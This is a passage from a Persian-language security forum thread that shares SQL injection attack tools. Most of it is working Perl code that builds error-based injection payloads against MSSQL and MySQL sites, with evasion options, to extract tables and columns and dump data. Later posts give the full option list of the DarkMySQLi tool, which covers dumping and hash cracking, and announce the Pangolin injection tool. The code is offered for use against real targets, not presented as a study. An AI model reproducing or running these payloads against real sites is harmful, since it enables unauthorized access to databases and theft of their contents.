         print "\n[+] Result Saved to $vulnfile\n";
	 }
}

sub mssqlcolumn
{
     my $site   = $_[0];
     my $ev     = $_[1];
	 my $tblextrct = $_[2];
	 print "[+] Table To Extract From $tblextrct\n";
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
	 print "\n[+] Table Extracting, Started Please Wait ....\n\n";
	 $data = "'Ws65qd798sqd9878'";
     $table = "convert(int,(select".$add."top".$add."1".$add."column_name".$add."from".$add."information_schema.columns".$add."where".$add."table_name"."="."'$tblextrct'".$add."And".$add."column_name".$add."not".$add."in".$add."($data)"."));--";
	 print "[!] Columns : //// \n\n"; 
     for ($i;$i<1500;$i++)
     {
         my $injection = $site.$table ;
         my $useragent = LWP::UserAgent->new();
		 $ua->proxy("http", "http://$proxy/") if defined($proxy);
         my $request   = $useragent->get($injection);
         my $response  = $request->content;
         if ($response =~ /.*?value\s'(.*?)'\sto.*/sm)
         {
	         print "[+] ".$1."\n";
			 push (@extcols,$1);
	         $start = "(";
	         $data .= ",'$1'";
	         $end   = ")";
	         $total = $start.$data.$end;
	         $table = "convert(int,(select".$add."top".$add."1".$add."column_name".$add."from".$add."information_schema.columns".$add."where".$add."table_name"."="."'$tblextrct'".$add."And".$add."column_name".$add."not".$add."in".$add."$total"."));--";	
         }
     }
	 if (defined($vulnfile))
     {
		 open(vuln_file,">>$vulnfile") ;
         print vuln_file "[!] Target            : $site\n";
         print vuln_file "[!] evasion           : $ev\n";
         print vuln_file "[!] Data  :: ----     \n\n\n";
		 $i=0;
		 foreach(@extcols)
		 {
             print vuln_file $extcols[$i]."\n";
			 $i++;
		 }
         close(vuln_file);
         print "\n[+] Result Saved to $vulnfile\n";
	 }
}

sub mssqldump
{
     my $site   = $_[0];
     my $ev     = $_[1];
	 my $tblextrct = $_[2];
	 my $colmextrct = $_[3];
	 print "[+] Table  : $tblextrct\n";
	 print "[+] Column : $colmextrct\n";
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
	 print "\n[+] Table Extracting, Started Please Wait ....\n\n";
	 $data = "'Ws65qd798sqd9878'";
     $table = "convert(int,(select".$add."top".$add."1".$add."$colmextrct".$add."from".$add."$tblextrct".$add."where".$add."$colmextrct".$add."not".$add."in".$add."($data)"."));--";
	 print "[!] Columns : //// \n\n"; 
     for ($i;$i<1500;$i++)
     {
         my $injection = $site.$table ;
         my $useragent = LWP::UserAgent->new();
		 $ua->proxy("http", "http://$proxy/") if defined($proxy);
         my $request   = $useragent->get($injection);
         my $response  = $request->content;
         if ($response =~ /.*?value\s'(.*?)'\sto.*/sm)
         {
	         print "[+] ".$1."\n";
			 push (@dumpdata,$1);
	         $start = "(";
	         $data .= ",'$1'";
	         $end   = ")";
	         $total = $start.$data.$end;
	         $table = "convert(int,(select".$add."top".$add."1".$add."$colmextrct".$add."from".$add."$tblextrct".$add."where".$add."$colmextrct".$add."not".$add."in".$add."$total"."));--";
         }
     }
	 if (defined($vulnfile))
     {
		 open(vuln_file,">>$vulnfile") ;
         print vuln_file "[!] Target            : $site\n";
         print vuln_file "[!] evasion           : $ev\n";
         print vuln_file "[!] Data  :: ----     \n\n\n";
		 $i=0;
		 foreach(@dumpdata)
		 {
             print vuln_file $dumpdata[$i]."\n";
			 $i++;
		 }
         close(vuln_file);
         print "\n[+] Result Saved to $vulnfile\n";
	 }
}

variables();
main();

if (defined($search_dork))
{
     print "[+] Vulnerability Scan\n" ;
     print "[+] Dork : $search_dork\n\n\n" ;
     vulnscanner();
	 if (defined($vulnfile))
     {
         open(vuln_file,">>$vulnfile") ;
         print vuln_file @mysqlvuln;
         print vuln_file @mssqlvuln;
         print vuln_file @accessvuln;
         close(vuln_file);
         print "[+] Result Saved to $vulnfile\n";
         exit();
     }
} 

if (defined($mysql_count_target))
{
     print "[+] MySQL Column Counter\n\n" ;
     print "[+] Target : $mysql_count_target\n" ;
     if ($evasion eq '/*')
	 {
	     print "[+] Evasion : /**/\n" ;
	 }
     elsif ($evasion eq '%20')
	 {
	     print "[+] Evasion : %20\n" ;
	 }
	 else
	 {
	     print "[+] Evasion : --\n" ;
		 $evasion = "--"
	 }
	 mysqlcount($mysql_count_target,$evasion);
}

if (defined($mysql_details_target))
{
     print "[+] MySQL database details\n\n" ;
     print "[+] Target : $mysql_details_target\n" ;
     if ($evasion eq '/*')
	 {
	     print "[+] Evasion : /**/\n" ;
	 }
     elsif ($evasion eq '%20')
	 {
	     print "[+] Evasion : %20\n" ;
	 }
	 else
	 {
	     print "[+] Evasion : --\n" ;
		 $evasion = "--"
	 }
	 mysqldetails($mysql_details_target,$evasion);
}

if (defined($mysql_schema_target))
{
     print "[+] MySQL Schema Extractor details\n\n" ;
     print "[+] Target : $mysql_schema_target\n" ;
     if ($evasion eq '/*')
	 {
	     print "[+] Evasion : /**/\n" ;
	 }
     elsif ($evasion eq '%20')
	 {
	     print "[+] Evasion : %20\n" ;
	 }
	 else
	 {
	     print "[+] Evasion : --\n" ;
		 $evasion = "--"
	 }
	 mysqlschema($mysql_schema_target,$evasion);
}

if (defined($mysql_dump_target))
{
     if (!defined($sql_dump_column))
	 {
	     print "[!] Please Defind At Least A Column\n";
		 exit();
	 }
     elsif (!defined($sql_dump_table))
	 {
	     print "[!] Please Defind Table Name\n";
		 exit();
	 }
	 else
	 {
	     print "[+] MySQL Data Dumper details\n\n" ;
         print "[+] Target : $mysql_dump_target\n" ;
         if ($evasion eq '/*')
	     {
	         print "[+] Evasion : /**/\n" ;
	     }
         elsif ($evasion eq '%20')
	     {
	         print "[+] Evasion : %20\n" ;
	     }
	     else
	     {
	         print "[+] Evasion : --\n" ;
			 $evasion = "--"
	     }
		 mysqldump($mysql_dump_target,$sql_dump_column,$sql_dump_table,$evasion);
	 }	 
}

if (defined($mysql_fuzz_table))
{
     if(!defined($word_list))
     {
	     print "[!] Please Define A list of tables to load\n";
		 exit();
     }	 
	 else
	 {
	     print "[+] MySQL Tables Fuzzer\n\n" ;
         print "[+] Target : $mysql_fuzz_table\n" ;
	     if ($evasion eq '/*')
         {
             print "[+] Evasion : /**/\n" ;
         }
         elsif ($evasion eq '%20')
         {
             print "[+] Evasion : %20\n" ;
         } 
         else
         {
             print "[+] Evasion : --\n" ;
			 $evasion = "--"
         }
	     mysqlfuzztable($mysql_fuzz_table,$evasion,$word_list);	 
	 }
}

if (defined($mysql_fuzz_column))
{
     if(!defined($word_list))
     {
	     print "[!] Please Define A list of tables to load\n";
		 exit();
     }	 
     elsif(!defined($sql_dump_table))
     {
	     print "[!] Please Define A Table To Fuzz it's Columns\n";
		 exit();
     }	
	 else
	 {
	     print "[+] MySQL Columns Fuzzer\n\n" ;
         print "[+] Target : $mysql_fuzz_column\n" ;
	     if ($evasion eq '/*')
         {
             print "[+] Evasion : /**/\n" ;
         }
         elsif ($evasion eq '%20')
         {
             print "[+] Evasion : %20\n" ;
         } 
         else
         {
             print "[+] Evasion : --\n" ;
			 $evasion = "--"
         }
	     mysqlfuzzcolumn($mysql_fuzz_column,$evasion,$word_list,$sql_dump_table);	 
	 }
}

if (defined($mysql_load_file))
{
     if(!defined($word_list))
     {
	     print "[!] Please Define A list of tables to load\n";
		 exit();
     }	 
	 else
	 {
	     print "[+] MySQL Load_File Fuzzer\n\n" ;
         print "[+] Target : $mysql_load_file\n" ;
	     if ($evasion eq '/*')
         {
             print "[+] Evasion : /**/\n" ;
         }
         elsif ($evasion eq '%20')
         {
             print "[+] Evasion : %20\n" ;
         } 
         else
         {
             print "[+] Evasion : --\n" ;
			 $evasion = "--"
         }
	     mysqlfile($mysql_load_file,$evasion,$word_list);	 
	 }
}

if (defined($mssql_details_target))
{
	 print "[+] MsSQL DB Details\n\n" ;
     print "[+] Target : $mssql_details_target\n" ;
	 if ($evasion eq '/*')
     {
         print "[+] Evasion : /**/\n" ;
     }
     elsif ($evasion eq '%20')
     {
         print "[+] Evasion : %20\n" ;
     }
     else
     {
         print "[+] Evasion : --\n" ;
		 $evasion = "--"
     }
	 mssqldetails($mssql_details_target,$evasion);	 
}

if (defined($mssql_table_target))
{
	 print "[+] MsSQL Tables Extractor\n\n" ;
     print "[+] Target : $mssql_table_target\n" ;
	 if ($evasion eq '/*')
     {
         print "[+] Evasion : /**/\n" ;
     }
     elsif ($evasion eq '%20')
     {
         print "[+] Evasion : %20\n" ;
     }
     else
     {
         print "[+] Evasion : --\n" ;
		 $evasion = "--"
     }
	 mssqltable($mssql_table_target,$evasion);	 
}

if (defined($mssql_column_target))
{
     if(!defined($sql_dump_table))
	 {
	     print "[!] Please Defind At Least A Table do Extract from\n";
		 exit();
	 }
	 else
	 {
	     print "[+] MsSQL Columns Extractor\n\n" ;
         print "[+] Target : $mssql_column_target\n" ;
	     if ($evasion eq '/*')
         {
             print "[+] Evasion : /**/\n" ;
         }
         elsif ($evasion eq '%20')
         {
             print "[+] Evasion : %20\n" ;
         } 
         else
         {
             print "[+] Evasion : --\n" ;
			 $evasion = "--"
         }
	     mssqlcolumn($mssql_column_target,$evasion,$sql_dump_table);	 
	 }
}

if (defined($mssql_dump_target))
{
     if(!defined($sql_dump_table))
	 {
	     print "[!] Please Defind At Least A Table\n";
		 exit();
	 }
     elsif(!defined($sql_dump_column))
	 {
	     print "[!] Please Defind At Least A Column\n";
		 exit();
	 }
	 else
	 {
	     print "[+] MsSQL Data Dumper\n\n" ;
         print "[+] Target : $mssql_dump_target\n" ;
	     if ($evasion eq '/*')
         {
             print "[+] Evasion : /**/\n" ;
         }
         elsif ($evasion eq '%20')
         {
             print "[+] Evasion : %20\n" ;
         } 
         else
         {
             print "[+] Evasion : --\n" ;
			 $evasion = "--"
         }
	     mssqldump($mssql_dump_target,$evasion,$sql_dump_table,$sql_dump_column);	 
	 }
}
__________________
http://img2.uploadhouse.com/fileuploads/11308/11308802445d175365c709f366b22832c3750bb8.png
777 آنلاین نیست.   پاسخ با نقل قول
The Following User Says Thank You to 777 For This Useful Post:
saeedhunter (04-09-2012)
قدیمی 10-20-2009, 08:06 PM   #9
مديريت كل سايت
 
M3hr@n.S آواتار ها
 
تاریخ عضویت: May 2009
نوشته ها: 160
Thanks: 206
Thanked 418 Times in 99 Posts
پیش فرض DarkSQLi – Advance sql injection script and tool
یک ابزار injection به زبان python (مخصوص MySQL)

کد:
Usage: ./darkMySQLi.py [options]
Options:
  -h, --help           shows this help message and exits
  -d, --debug          display URL debug information

  Target:
    -u URL, --url=URL  Target url

  Methodology:
    -b, --blind        Use blind methodology (req: --string)
    -s, --string       String to match in page when the query is valid
  Method:
    --method=PUT       Select to use PUT method ** NOT WORKING
  Modes:
    --dbs              Enumerate databases           MySQL v5+
    --schema           Enumerate Information_schema (req: -D,
                       opt: -T)                      MySQL v5+
    --full             Enumerate all we can          MySQL v5+
    --info             MySQL Server configuration    MySQL v4+
    --fuzz             Fuzz Tables & Columns Names   MySQL v4+
    --findcol          Find Column length            MySQL v4+
    --dump             Dump database table entries  (req: -T,
                       opt: -D, -C, --start)         MySQL v4+
    --crack=HASH       Crack MySQL Hashs (req: --wordlist)
    --wordlist=LIS.TXT Wordlist to be used for cracking
  Define:
    -D DB              database to enumerate
    -T TBL             database table to enumerate
    -C COL             database table column to enumerate
  Optional:
    --ssl              To use SSL
    --end              To use   +  and -- for the URLS --end "--" (Default)
                       To use /**/ and /* for the URLS --end "/*"
    --rowdisp          Do not display row # when dumping
    --start=ROW        Row number to begin dumping at
    --where=COL,VALUE  Use a where clause in your dump
    --orderby=COL      Use a orderby clause in your dump
    --cookie=FILE.TXT  Use a Mozilla cookie file
    --proxy=PROXY      Use a HTTP proxy to connect to the target url
    --output=FILE.TXT  Output results of tool to this file
فایل های پیوست شده
نوع فایل: rar darkmysqli16.rar‏ (14.0 کیلو بایت, 166 نمایش)
__________________

لحظات را گذرانديم كه به خوشبختي برسيم ، غافل از اينكه لحظات همان خوشبختي اند .

M3hr@n.S آنلاین نیست.   پاسخ با نقل قول
The Following 2 Users Say Thank You to M3hr@n.S For This Useful Post:
saeedhunter (02-11-2011), zh4d0w (04-10-2012)
قدیمی 11-28-2009, 05:40 PM   #10
عضو فعال
 
hadi85 آواتار ها
 
تاریخ عضویت: Sep 2009
نوشته ها: 160
Thanks: 35
Thanked 150 Times in 75 Posts
پیش فرض Pangolin – Automatic SQL injection
ورژن جدید Pangolin

یک ابزار حرفه ای برای injection

از Databaseهای زیر پشتیبانی میکنه :
  • Oracle
  • MS SQL Server 2000
  • MS SQL Server 2005
  • Sybase
  • Access
  • Mysql
  • DB2
  • Informix

دانلود : [فقط اعضای سایت قادر به دیدن لینکها میباشند ]
hadi85 آنلاین نیست.   پاسخ با نقل قول
The Following 2 Users Say Thank You to hadi85 For This Useful Post:
saeedhunter (02-11-2011), zh4d0w (04-10-2012)
پاسخ
صفحه 1 از 4 1 234

برچسب ها
injection, mssql, mysql, oracle, pangolin, postgresql, sql, sql injection, sqlmap, مرجع, ابزار

« موضوع قبلی | موضوع بعدی »
ابزارهای موضوع
نحوه نمایش
حالت خطی حالت خطی

مجوز های ارسال و ویرایش
شما نمیتوانید موضوع جدیدی ارسال کنید
شما امکان ارسال پاسخ را ندارید
شما نمیتوانید فایل پیوست در پست خود ضمیمه کنید
شما نمیتوانید پست های خود را ویرایش کنید
BB code هست فعال
شکلک ها فعال است
کد [IMG] فعال است
کد HTML غیر فعال است
Trackbacks are فعال
Pingbacks are فعال
Refbacks are فعال


اکنون ساعت 06:16 AM برپایه ساعت جهانی (GMT - گرینویچ) +4.5 می باشد.

تماس با ما - ITSecTeam - بایگانی - بالا

Powered by vBulletin
Copyright ©2000 - 2012, Jelsoft Enterprises Ltd

كليه حقوق اين وب سايت براي ITSecTeam محفوظ ميباشد


Content Relevant URLs by vBSEO ©2011, Crawlability, Inc.